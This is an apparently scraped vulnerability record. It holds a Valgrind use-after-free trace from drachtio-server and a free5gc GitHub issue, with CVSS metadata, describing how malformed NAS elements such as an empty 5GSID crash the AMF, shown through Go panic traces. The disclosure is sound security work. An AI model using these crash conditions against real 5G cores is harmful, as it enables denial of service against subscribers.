/usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==12406== by 0x24022D: drachtio::write_cb(void*, unsigned long, unsigned long, drachtio::RequestHandler::_ConnInfo*) (request-handler.cpp:351) ==12406== by 0x4870733: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488348A: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488CAD2: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E15C: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2C4: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488BC0B: curl_multi_add_handle (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x24294C: drachtio::RequestHandler::startRequest(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) (request-handler.cpp:538) ==12406== ==12406== Invalid read of size 4 ==12406== at 0x241585: drachtio::event_cb(drachtio::RequestHandler::_GlobalInfo*, int, int, boost::system::error_code const&, int*) (request-handler.cpp:280) ==12406== by 0x244C91: operator()<void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::rrlist2<const boost::system::error_code&, long unsigned int const&> > (bind.hpp:510) ==12406== by 0x244C91: operator()<const boost::system::error_code&, long unsigned int const&> (bind.hpp:1297) ==12406== by 0x244C91: operator() (bind_handler.hpp:289) ==12406== by 0x244C91: asio_handler_invoke<boost::asio::detail::binder2<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::system::error_code, long unsigned int> > (handler_invoke_hook.hpp:88) ==12406== by 0x244C91: invoke<boost::asio::detail::binder2<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::system::error_code, long unsigned int>, boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > > > (handler_invoke_helpers.hpp:54) ==12406== by 0x244C91: complete<boost::asio::detail::binder2<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::system::error_code, long unsigned int> > (handler_work.hpp:512) ==12406== by 0x244C91: boost::asio::detail::reactive_null_buffers_op<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, boost::system::error_code const&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::asio::any_io_executor>::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) (reactive_null_buffers_op.hpp:84) ==12406== by 0x1C6DB6: complete (scheduler_operation.hpp:40) ==12406== by 0x1C6DB6: do_complete (epoll_reactor.ipp:806) ==12406== by 0x1C6DB6: boost::asio::detail::epoll_reactor::descriptor_state::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) (epoll_reactor.ipp:796) ==12406== by 0x1C68CB: complete (scheduler_operation.hpp:40) ==12406== by 0x1C68CB: do_run_one (scheduler.ipp:492) ==12406== by 0x1C68CB: boost::asio::detail::scheduler::run(boost::system::error_code&) (scheduler.ipp:210) ==12406== by 0x240096: run (io_context.ipp:63) ==12406== by 0x240096: drachtio::RequestHandler::threadFunc() (request-handler.cpp:448) ==12406== by 0x4D67B2E: ??? (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25) ==12406== by 0x48EDFA2: start_thread (pthread_create.c:486) ==12406== by 0x50C606E: clone (clone.S:95) ==12406== Address 0x73bfaa0 is 0 bytes inside a block of size 4 free'd ==12406== at 0x48369AB: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==12406== by 0x24140C: remsock (request-handler.cpp:107) ==12406== by 0x24140C: drachtio::sock_cb(void*, int, int, void*, void*) (request-handler.cpp:86) ==12406== by 0x488AAC0: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E179: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2C4: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2DF: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== Block was alloc'd at ==12406== at 0x4837B65: calloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==12406== by 0x241423: addsock (request-handler.cpp:100) ==12406== by 0x241423: drachtio::sock_cb(void*, int, int, void*, void*) (request-handler.cpp:90) ==12406== by 0x488A9D0: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E179: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2C4: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488BC0B: curl_multi_add_handle (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x24294C: drachtio::RequestHandler::startRequest(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) (request-handler.cpp:538) ==12406== by 0x243665: __invoke_impl<void, void (drachtio::RequestHandler::*&)(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool), drachtio::RequestHandler*&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, bool&> (invoke.h:73) ==12406== by 0x243665: __invoke<void (drachtio::RequestHandler::*&)(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool), drachtio::RequestHandler*&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, bool&> (invoke.h:95) ==12406== by 0x243665: __call<void, 0, 1, 2, 3, 4, 5> (functional:400) ==12406== by 0x243665: operator()<> (functional:484) ==12406== by 0x243665: asio_handler_invoke<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)> > (handler_invoke_hook.hpp:88) ==12406== by 0x243665: invoke<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)>, std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)> > (handler_invoke_helpers.hpp:54) ==12406== by 0x243665: complete<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)> > (handler_work.hpp:512) ==12406== by 0x243665: boost::asio::detail::completion_handler<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, bool))(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool)>, boost::asio::io_context::basic_executor_type<std::allocator<void>, 0ul> >::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) (completion_handler.hpp:74) ==12406== by 0x1C68CB: complete (scheduler_operation.hpp:40) ==12406== by 0x1C68CB: do_run_one (scheduler.ipp:492) ==12406== by 0x1C68CB: boost::asio::detail::scheduler::run(boost::system::error_code&) (scheduler.ipp:210) ==12406== ==12406== Invalid read of size 4 ==12406== at 0x241651: drachtio::event_cb(drachtio::RequestHandler::_GlobalInfo*, int, int, boost::system::error_code const&, int*) (request-handler.cpp:297) ==12406== by 0x244C91: operator()<void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::rrlist2<const boost::system::error_code&, long unsigned int const&> > (bind.hpp:510) ==12406== by 0x244C91: operator()<const boost::system::error_code&, long unsigned int const&> (bind.hpp:1297) ==12406== by 0x244C91: operator() (bind_handler.hpp:289) ==12406== by 0x244C91: asio_handler_invoke<boost::asio::detail::binder2<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::system::error_code, long unsigned int> > (handler_invoke_hook.hpp:88) ==12406== by 0x244C91: invoke<boost::asio::detail::binder2<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::system::error_code, long unsigned int>, boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > > > (handler_invoke_helpers.hpp:54) ==12406== by 0x244C91: complete<boost::asio::detail::binder2<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, const boost::system::error_code&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::system::error_code, long unsigned int> > (handler_work.hpp:512) ==12406== by 0x244C91: boost::asio::detail::reactive_null_buffers_op<boost::_bi::bind_t<void, void (*)(drachtio::RequestHandler::_GlobalInfo*, int, int, boost::system::error_code const&, int*), boost::_bi::list5<boost::_bi::value<drachtio::RequestHandler::_GlobalInfo*>, boost::_bi::value<int>, boost::_bi::value<int>, boost::arg<1>, boost::_bi::value<int*> > >, boost::asio::any_io_executor>::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) (reactive_null_buffers_op.hpp:84) ==12406== by 0x1C6DB6: complete (scheduler_operation.hpp:40) ==12406== by 0x1C6DB6: do_complete (epoll_reactor.ipp:806) ==12406== by 0x1C6DB6: boost::asio::detail::epoll_reactor::descriptor_state::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) (epoll_reactor.ipp:796) ==12406== by 0x1C68CB: complete (scheduler_operation.hpp:40) ==12406== by 0x1C68CB: do_run_one (scheduler.ipp:492) ==12406== by 0x1C68CB: boost::asio::detail::scheduler::run(boost::system::error_code&) (scheduler.ipp:210) ==12406== by 0x240096: run (io_context.ipp:63) ==12406== by 0x240096: drachtio::RequestHandler::threadFunc() (request-handler.cpp:448) ==12406== by 0x4D67B2E: ??? (in /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.25) ==12406== by 0x48EDFA2: start_thread (pthread_create.c:486) ==12406== by 0x50C606E: clone (clone.S:95) ==12406== Address 0x73bfaa0 is 0 bytes inside a block of size 4 free'd ==12406== at 0x48369AB: free (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==12406== by 0x24140C: remsock (request-handler.cpp:107) ==12406== by 0x24140C: drachtio::sock_cb(void*, int, int, void*, void*) (request-handler.cpp:86) ==12406== by 0x488AAC0: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E179: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2C4: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2DF: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== Block was alloc'd at ==12406== at 0x4837B65: calloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so) ==12406== by 0x241423: addsock (request-handler.cpp:100) ==12406== by 0x241423: drachtio::sock_cb(void*, int, int, void*, void*) (request-handler.cpp:90) ==12406== by 0x488A9D0: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E179: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488E2C4: curl_multi_socket_action (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x2409A6: drachtio::timer_cb(boost::system::error_code const&, drachtio::RequestHandler::_GlobalInfo*) [clone .part.450] (request-handler.cpp:333) ==12406== by 0x24119F: timer_cb (error_code.hpp:315) ==12406== by 0x24119F: drachtio::multi_timer_cb(void*, long, drachtio::RequestHandler::_GlobalInfo*) (request-handler.cpp:169) ==12406== by 0x488A47B: ??? (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x488BC0B: curl_multi_add_handle (in /usr/lib/x86_64-linux-gnu/libcurl.so.4.5.0) ==12406== by 0x24294C: drachtio::RequestHandler::startRequest(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) (request-handler.cpp:538) ==12406== by 0x243665: __invoke_impl<void, void (drachtio::RequestHandler::*&)(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool), drachtio::RequestHandler*&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, bool&> (invoke.h:73) ==12406== by 0x243665: __invoke<void (drachtio::RequestHandler::*&)(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool), drachtio::RequestHandler*&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, bool&> (invoke.h:95) ==12406== by 0x243665: __call<void, 0, 1, 2, 3, 4, 5> (functional:400) ==12406== by 0x243665: operator()<> (functional:484) ==12406== by 0x243665: asio_handler_invoke<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)> > (handler_invoke_hook.hpp:88) ==12406== by 0x243665: invoke<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)>, std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)> > (handler_invoke_helpers.hpp:54) ==12406== by 0x243665: complete<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, std::__cxx11::basic_string<char>, bool))(const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, const std::__cxx11::basic_string<char>&, bool)> > (handler_work.hpp:512) ==12406== by 0x243665: boost::asio::detail::completion_handler<std::_Bind<void (drachtio::RequestHandler::*(drachtio::RequestHandler*, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, bool))(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool)>, boost::asio::io_context::basic_executor_type<std::allocator<void>, 0ul> >::do_complete(void*, boost::asio::detail::scheduler_operation*, boost::system::error_code const&, unsigned long) (completion_handler.hpp:74) ==12406== by 0x1C68CB: complete (scheduler_operation.hpp:40) ==12406== by 0x1C68CB: do_run_one (scheduler.ipp:492) ==12406== by 0x1C68CB: boost::asio::detail::scheduler::run(boost::system::error_code&) (scheduler.ipp:210) ==12406== ```
CVE-2022-45474: Use-after-free in event_cb when drachtio-server receives a call
https://api.github.com/repos/drachtio/drachtio-server/issues/240/comments
2
2022-11-18T14:59:47Z
2022-11-25T15:41:06Z
https://github.com/drachtio/drachtio-server/issues/240
1,455,282,743
240
4,409
CVE-2022-38871
2022-11-18T23:15:20.117
In Free5gc v3.0.5, the AMF breaks due to malformed NAS messages.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/free5gc/free5gc/issues/198" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/free5gc/free5gc/issues/198" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "7AC5244A-13E0-4776-A4C6-58A9784FDAFF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/free5gc/free5gc/issues/198
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "free5gc", "free5gc" ]
## Describe the bug While testing the free5gc AMF for some NAS basic security features and fuzzing, I could trigger several crashes, while sending malformed NAS message. This means those issues are relatively exposed as they can be trigger by any 5G subscriber, in the principle. Here, all memory issues due to mishandled NAS messages and IE structures are caught by the GO memory runtime, which protects the binary for potential exploitable cases. ## To Reproduce No easy way to reproduce with available open-source tools. A modification of a gNB / UE emulator can be done to send malformed NAS messages. ## Expected behavior An attacker could leverage this to cause excessive downtime and resource consumption against a pool of AMF. As much as possible, crashing the binary should be avoided when decoding subscriber's provided NAS signaling message. During the decoding process, verifications should be made to ensure the messages are valid ; in case of invalid or malformed messages, it should be dropped and the corresponding UE context should be deleted. ## Environment (please complete the following information): - free5GC Version: v3.0.5 - OS: Ubuntu 20.04 - Kernel version: 5.4.0-62-generic - go version: go1.14.4 linux/amd64 ## Trace File ### Configuration File No specific configuration is required. ### PCAP File No specific pcap file is provided. If required, pcap corresponding some specific crashes can be provided. ### Log File The following part lists some GOLANG stacktraces and corresponding malformed NAS and IE cases. When a IE with TLV structure (type 4 or 6) is provided, but without the expected length, free5gc crashes, e.g. with an empty 5GSID: ``` 2021-03-08T12:18:12Z [INFO][AMF][GMM][AMF_UE_NGAP_ID:31] Handle Registration Request panic: runtime error: index out of range [0] with length 0 goroutine 7 [running]: github.com/free5gc/amf/gmm.HandleRegistrationRequest(0xc00011b080, 0xe3727a, 0xb, 0xf, 0xc0002cd790, 0xc0004e3530, 0xb75bb2) /home/p1sec/free5gc/NFs/amf/gmm/handler.go:425 +0x1969 github.com/free5gc/amf/gmm.DeRegistered(0xc0005a0600, 0xe373b9, 0xb, 0xc0005a0900) /home/p1sec/free5gc/NFs/amf/gmm/sm.go:30 +0x3ef github.com/free5gc/fsm.(*FSM).SendEvent(0xc00009ab20, 0xc0005a0600, 0xe373b9, 0xb, 0xc0005a0900, 0x0, 0xcb6ba0) /home/p1sec/go/pkg/mod/github.com/free5gc/fsm@v1.0.0/fsm.go:95 +0x22d github.com/free5gc/amf/nas.Dispatch(0xc00011b080, 0xe3727a, 0xb, 0xf, 0xc00047f980, 0x20, 0xc00047f980) /home/p1sec/free5gc/NFs/amf/nas/dispatch.go:22 +0x251 github.com/free5gc/amf/nas.HandleNAS(0xc0005d8a20, 0xf, 0xc000230f20, 0x11, 0x20) /home/p1sec/free5gc/NFs/amf/nas/handler.go:39 +0x178 github.com/free5gc/amf/ngap.HandleInitialUEMessage(0xc0005a4080, 0xc000248ce0) /home/p1sec/free5gc/NFs/amf/ngap/handler.go:1003 +0x4dc github.com/free5gc/amf/ngap.Dispatch(0xfab8c0, 0xc00013fbe0, 0xc00029e000, 0x3c, 0x2000) /home/p1sec/free5gc/NFs/amf/ngap/dispatcher.go:47 +0x3bb github.com/free5gc/amf/ngap/service.handleConnection(0xc00013fbe0, 0x2000, 0xe6a348, 0xe6a350) /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:204 +0x700 created by github.com/free5gc/amf/ngap/service.listenAndServe /home/p1sec/free5gc/NFs/amf/ngap/service/service.go:136 +0xc43 ``` Or a UE Security Capabilities: ``` panic: runtime error: index out of range [1] with length 0 goroutine 49 [running]: github.com/free5gc/nas/nasType.(*UESecurityCapability).GetIA2_128_5G(...) /home/p1sec/go/pkg/mod/github.com/free5gc/nas@v1.0.0/nasType/NAS_UESecurityCapability.go:197 github.com/free5gc/amf/context.(*AmfUe).SelectSecurityAlg(0xc000118580, 0xc000385af8, 0x1, 0x8, 0xc000385b00, 0x1, 0x8) /home/p1sec/free5gc/NFs/amf/context/amf_ue.go:501 +0x226 github.com/free5gc/amf/gmm.SecurityMode(0xc00006f710, 0xe37356, 0xb, 0xc0003e7200) /home/p1sec/free5gc/NFs/amf/gmm/sm.go:221 +0xfb3 github.com/free5gc/fsm.(*FSM).SendEvent(0xc000386b50, 0xc00006f710, 0xe3efd6, 0x16, 0xc0003e7200, 0x0, 0x0) /home/p1sec/go/pkg/mod/github.com/free5gc/fsm@v1.0.0/fsm.go:100 +0x2f4 github.com/free5gc/amf/gmm.HandleAuthenticationResponse(0xc000118580, 0xe3727a, 0xb, 0xc0004e1b20, 0x1, 0x20) /home/p1sec/free5gc/NFs/amf/gmm/handler.go:1900 +0xdd8 github.com/free5gc/amf/gmm.Authentication(0xc00006f710, 0xe373b9, 0xb, 0xc0003e6390) /home/p1sec/free5gc/NFs/amf/gmm/sm.go:165 +0x5ce github.com/free5gc/fsm.(*FSM).SendEvent(0xc000386b50, 0xc00006f710, 0xe373b9, 0xb, 0xc0003e6390, 0xc0004e1a60, 0xcb6ba0) 